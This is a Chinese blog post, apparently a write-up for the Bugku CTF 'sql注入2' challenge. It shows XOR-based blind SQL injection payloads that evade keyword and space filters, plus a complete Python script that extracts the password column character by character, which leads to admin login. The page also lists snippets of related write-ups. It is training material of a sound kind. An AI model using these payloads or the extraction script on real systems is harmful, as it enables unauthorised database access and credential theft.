bugku-web-sql注入2

最新推荐文章于 2022-05-20 16:39:15 发布
最新推荐文章于 2022-05-20 16:39:15 发布
阅读量360 收藏
点赞数
文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42444939/article/details/100110811
版权

发现是一个经典的sql注入主界面~
在这里插入图片描述
题目一开始就提示说过全tm都过滤了,但还是跑跑字典看嘛
抓包 => 爆破如下

在这里插入图片描述
发现空格,逗号,注释,or,and等通通返回提示非法字符QAQ
但所幸^没有被过滤,于是尝试异或注入
构造payload(uname)如下
usera’^(length(database())=1)^'userb

解释一下为啥,猜测这样的payload能形成的sql语句应为
… where uname=‘usera’^(length(database())=1)^‘userb’ …

注意这里的^优先级高于=,且字符串在与bool类型进行异或时,会先强制类型转换为数字,如’233dktb’会转换为233,'usera’和’userb’无数字前缀,所以转化为0
于是payload等价于0^(length(database())=1)^0,当中间返回true时
达到uname=true效果,反之为uname=false效果

再注意一个点,因为这里是字符串类型的uname和bool做比较,所以uname=false能过所有的非数字前缀uname验证,此时页面回显password error,uname=true则回显username error(这估计是因为靶场数据库里没有数字前缀的uname吧)
在这里插入图片描述就这么成功爆出database()长度为3
接下来构造payload=usera’^(ascii(substr((database())from(1)))=99)^'userb
(Tips:本题for被过滤,因此采用省略for的方法拿到从指定位到结束位的字符串,又由于ascii函数的参数如果是个字符串,只返回第一个字符的ascii值,所以构造如上payload)
进一步爆破出database()每一位的ascii值
爆完库名,很自然的想接下来继续爆表名字段名拿flag
但是
但是
但是
我们悲催地发现过滤了or的同时,
information_schema也被ban了qaq
所以选择放弃这种做法(然后你告诉我上文全是废话???(狗头保命)

又想了贼久,猜测sql语句可能是 … where uname=$_POST[‘uname’] and passwd=$_POST[‘passwd’];
也就是说我们猜测数据库里的字段名也叫passwd
这样就可以在uname里构造payload来爆出passwd,从而成功登陆
懒得写了直接贴写的脚本

import requests

url = "http://123.206.87.240:8007/web2/login.php"
s = requests.session()
passwd_len = 1
while(1):
	uname = "ua'^(length(passwd)=" + str(passwd_len) + ")^'ub" 
 	# length()=true => uname=true => "username error!"
 	passwd = "nmdwsm"
	payload = {'uname':uname,'passwd':passwd}
 	r = s.post(url, data = payload)
 	r.encoding = r.apparent_encoding
 	if("username error!!" in r.text):
  		break
 	passwd_len += 1
print("Length of passwd:" + str(passwd_len))
key = ""
for i in range(1, passwd_len + 1):
	for value in range(32, 127):
		uname = "ua'^(ascii(substr((passwd)from(" + str(i) + ")))=" + str(value) + ")^'ub"
		passwd = "nmdwsm"
		payload = {'uname':uname,'passwd':passwd}
		r = s.post(url, data = payload)
		r.encoding = r.apparent_encoding
		#print(r.text)
		if("username error!!" in r.text):
   			key += chr(value)
   			break
print("Passwd:" + key)

在这里插入图片描述
拿到这玩意儿,因为一般mysql里存储passwd用md5,又发现它长度32,于是md5解密拿到password [admin123]

登陆进后台,页面如下
在这里插入图片描述
输入ls,拿到flag(液

感觉还是脑洞要大qaq
btw这题看了下别人的wp,发现还有种解法是源码泄露,这里就不写辣
希望大噶早日成为练习时长两年半的渗透测试练习生(不是

|) |(7|3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
bugku-sql注入2 (附详细代码)
偷一个月亮
06-20 1938
构造select * from * where uname = $_POST[uname] uname=admin’-’ 此时uname=-1,不行 $sql = select * from users where username=$username; 在字符串username的值和数字0比较的时候,字符串变为了0 故此0=0 payload:admin’-(ascii(mid(R...
BugKu-SQL注入2
u013622866的博客
05-07 405
题目链接 戳我 简单尝试 首先当然是去试试万能密码了,emmmm,全被过滤了...... 试试弱口令呢? admin admin admin 123456 admin123 admin123 ... ... 然后,竟然还是弱口令.......(admin|admin123),但我岂能就这么放过它,嘿嘿,开始手注 题目给除了一些已经过滤的字符,通过尝试,发现并不...
bugku-Web-sql注入2(.DS_Store文件泄漏)
Sea_Sand息禅
03-31 979
泄露扫描脚本下载目录:https://github.com/lijiejie/ds_store_exp .DS_Store文件泄漏脚本扫描: 这些文件脚本已经给我们下载保存了,直接访问flag文件得到flag。 ...
Bugku SQL注入2
小白渣的博客
09-18 803
这道题目属实有点牛逼 1.直接 即可得到 flag 2.这加粗样式道题属于典型的DS_Store源码泄露,当然还有其他类型(常见web源码泄露总结)(常见的web源码泄露总结). 结果用御剑和bp爆口令好像都无果 ...
Bugku Web CTF-sql注入2
No Title
01-14 662
这道题过滤了许多关键字,包括但不限于select、union、and、or等,还有许多符号比如注释符--,,、#等(需要注意的是这里的过滤是指针对uname字段的过滤)。 一开始没什么思路,于是参考网上其他人写的wp,发现主要集中于以下两种解法: 用扫描工具扫出存在的漏洞,即.DS_STORE泄漏问题,然后获取对应的文件目录,可以看到目录下有flag文件。 灵光一闪,直接猜出目录下有admin或...
CTF-WEB入门DOC-2019版1
08-03
1. SQL注入:使用sqliabs-wp、PayloadsAllthetThings等资源进行练习。 2. 文件上传:通过uploadlabs-wp了解文件上传漏洞。 3. XSS:学习xss-labs、xsslabs-wp、prompt 1 to win等,掌握XSS攻击和防御。 4. SSRF:...
S2 AWD排位赛-9.zip
12-07
这些HTML文件可能隐藏了各种安全漏洞,参赛者需要利用Web安全知识,如SQL注入、XSS跨站脚本、文件包含漏洞、命令注入等,来发现并利用这些漏洞找到旗标。 1. **SQL注入**:HTML文件中可能含有动态SQL查询,如果存在...
sqli-labs(php7.3以上可运行)
01-29
每个级别都设计了一个具有不同安全漏洞Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种技术和防御策略。 三、PHP与SQL注入 在PHP环境中,开发者通常使用预处理语句和参数绑定来防止...
WEB安全渗透测试1-Msql基础
07-01
本课程主要为后续学习WEB安全提供铺垫,了解MYSQL技术的基本操作与查询方法,便于后续学习WEB安全的SQL注入的课程。本课主要讲解MYSQL数据库的建表,对数据表的增删改查以及where,group by ,order by,limit等查询...
Bugku题解-Sql注入2(web
flying_bird2019的博客
12-05 397
sql注入2 题目不难,但是真的用了好长时间研究(主要原因是本地数据库和题目环境不太一样)这题真的是一言难尽。。不知道出题人nb还是sb。。。(我寻思这篇文章不能被他本人看到吧) 先来说一下非注入的解法 方法一 要拿到flag就得先用账户登录成功,flag并不在数据库里,我先尝试了用字典爆破admin密码,没想到竟然成功了??? 后来发现竟然是弱口令!!!uname=admin passwd=admin123 (ps:果然,只要是人写出来代码就有可能存在安全漏洞,这种非预期解出题人直接原地去世。。。后面还有
bugkuCTF(SQL注入2)
痴人说梦梦中人
03-29 1338
看了很多writeup,大都是用的文件泄露漏洞获得的flag,鉴于本人水平有限还是没能看懂真正的sql注入,只能偷懒了,还是有些收获 大致思路就是先用nikto跑出站点的漏洞OSVDB-6694: /web2/.DS_Store,然后用ds_store_exp.py脚本跑出文件列表,获得flag.(nikto安装apt-get install nikto,脚本下载地址,如果提示缺少模块lib.ds...
bugku学习之43.sql注入2(只剩下from没过滤其余的全部过滤)
s11show_163的博客
03-05 290
考察: 逗号被过滤:substr(from for)或者mid(from for)截断 for被过滤:不使用for则mid(from)默认截断到字符串位 空格被过滤:不使用空格 admin字符串与另一个字符串比较时会被翻译成0或者空格 所以’admin’-’‘的意思是减去空字符串,所以值为0,更深远的’admin’-0-’‘先减去0再减去空字符串,值也为0,而’admin’-1-’'的值则为1。...
bugku-实战2-注入
偷一个月亮
06-29 318
news存在注入点,4个字段 select tables 发现表太多了,显示不全 这时用字符截断函数 get flag
bugku中的web
m0_62619269的博客
05-20 705
Simple_SSTI_1 先来简单看一下什么是SSTI模板注入 {{ … }}:装载一个变量,模板渲染的时候,会使用传进来的同名参数这个变量代表的值替换掉。 {% … %}:装载一个控制语句。 {# … #}:装载一个注释,模板渲染的时候会忽视这中间的值 很简单的模板注入,查看页面源代码 很明显,flag在secret_key下。最下面说在flas k里,我们经常建立一个SECRET_KEY,上方模板注入,直接访问URL+?flag={undefined{ config .SECRET_KEY}}得到f
bugku xss
rommel的博客
08-29 2734
XSS注入测试 1、请注入一段XSS代码,获取Flag值 2、必须包含alert(_key_),_key_会自动被替换 题解: 首先我们查看源代码 发现可以通过xss注入  所以我们只需将转义即可  于是我们构造?id=\u003cscript\u003ealert(_key_)\u003c/script\u003e 即可获得flag 如有疑问请联系qq:834368404
mysql注入万能密码_Natas14 Writeup(sql注入、sql万能密码)
weixin_39861255的博客
02-07 214
Natas14:是一个登录页面。源码如下。if(array_key_exists("username", $_REQUEST)) {$link = mysql_connect('localhost', 'natas14', '');mysql_select_db('natas14', $link);$query = "SELECT * from users where username=\"".$...
sql注入攻击实例_【SEA分享】Web渗透——SQL注入攻击原理及实例
weixin_39664995的博客
12-09 2978
相信点进来的你和我一样看不懂标题。没关系,不妨先了解一下,为什么我在网址栏里输入一串网址,就可以访问到这个网页。了解通信原理之后能帮助你更好的理解后面实例中的一顿“操作”。web通信原理介绍IP:ip 实际上就是生活中的地址,好像 XX省XX市XX区...... ,只不过 ip 是由数字组成。IP 分为内网ip 和 公网ip,公网地址是运营商分配,内网地址是路由器分配的。域名:方便记...
SQL注入CTF练习题WriteUp——“百度杯”CTF比赛 九月场SQL
Fighting_hawk的博客
05-17 3481
1. 本题关键在于关键字的绕过,需要耐心+细心,一个个尝试。 2. 同时在练习过程中多记录累积一些绕过的方法,比如这一道题的。
sqli-labs实验指导手册
最新发布
11-17
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值